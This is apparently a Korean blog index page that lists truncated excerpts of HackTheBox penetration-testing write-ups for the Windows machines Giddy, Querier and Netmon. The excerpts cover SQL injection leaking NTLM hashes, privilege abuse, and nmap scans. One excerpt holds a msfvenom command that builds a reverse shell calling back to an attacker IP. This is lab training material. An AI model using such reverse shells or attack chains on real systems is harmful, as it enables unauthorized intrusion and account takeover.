Solo의 정보보안 해킹하기

[모의 해킹] HackTheBox - Giddy Part 2

Giddy OS: Windows취약점: 취약한 서비스 권한 설정과 PowerShell 히스토리 파일 PowerShell 히스토리 파일에 기록된 정보를 기반으로 서비스를 조작해 악성 파일을 실행할 수 있다. 리버스쉘원할한 작업을 위해서 Evil-WinRM 세션에서 새로운 리버스쉘을 업로드 하자. msfvenom을 사용해서 윈도우용 TCP 기반 리버스쉘을 제작할 수 있다.┌─[✗]─[solo@parrot]─[~/Desktop/hack]└──╼ $msfvenom -p windows/powershell_reverse_tcp LHOST=10.10.14.108 LPORT=8000 -f exe -o reverse.exe*Evil-WinRM* PS C:\Users\Stacy\Documents> Invoke-WebReq..

[모의 해킹] HackTheBox - Giddy Part 1

GiddyOS: Windows취약점: SQL Injection, LLMNR Poisoning MS SQL Server를 데이터베이스로 사용하는 ASP.NET 기반 웹 어플리케이션이 돌아가는 머신이다. SQL Injection을 통해 MS SQL의 Stored Procedure인 xp_dirtree를 사용할 수 있다. xp_dirtree를 사용해 공격자에게 NTLM Hash를 전송하고 전송된 NTLM Hash를 크랙해 사용자 계정 비밀번호를 획득할 수 있다. 포트 스캐닝nmap -Pn -sS -p- -oN ./SYN_SCAN 10.10.10.104PORT     STATE SERVICE80/tcp   open  http443/tcp  open  https3389/tcp open  ms-wbt-server5..

QuerierOS: Windows취약점: SeImpersonatePrivilege   mssql-svc 계정이 가지고 있는 취약한 권한을 활용해 System 계정으로 리버스쉘을 생성할 수 있다. 시스템 정보 확인 PS C:\Windows\system32> systeminfoHost Name:                 QUERIEROS Name:                   Microsoft Windows Server 2019 StandardOS Version:                10.0.17763 N/A Build 17763OS Manufacturer:           Microsoft CorporationOS Configuration:          Member ServerOS Bu..

QuerierOS: Windows취약점: SMB 공유 풀더를 통한 민감 정보 유출 SMB 공유 풀더에 접근해서 파일을 다운로드하고 해당 파일의 vbascript에서 탈취한 계정으로 MS SQL Server를 조작해 리버스쉘을 획득해야 하는 머신이다. 포트 스캐닝nmap -Pn -sS --min-rate 1000 --max-retries 3 -p- -oN ./SYN_SCAN 10.10.10.125PORT STATE SERVICE135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds1433/tcp open ms-sql-s5985/tcp open wsman47001/tcp open winrm49664/tcp ..

NetmonOS: Windows취약점: 취약한 FTP 설정 취약한 FTP 서버와 PRTG 네트워크 모니터링 소프트웨어가 설치된 윈도우 머신이다. 기본적인 FTP 취약점에 대한 지식과 구글링을 통해 얻을 수 있는 PTRG 설치 디렉토리 구조에 대한 정보를 활용해서 공략할 수 있는 비교적 쉬운 난이도의 머신이다. 포트 스캐닝nmap -Pn -sS --min-rate 1000 --max-retries 3 -p- -oN ./SYN_SCAN 10.129.230.176PORT STATE SERVICE21/tcp open ftp80/tcp open http135/tcp open msrpc139/tcp open netbios-ssn445/tcp open microsoft-ds59..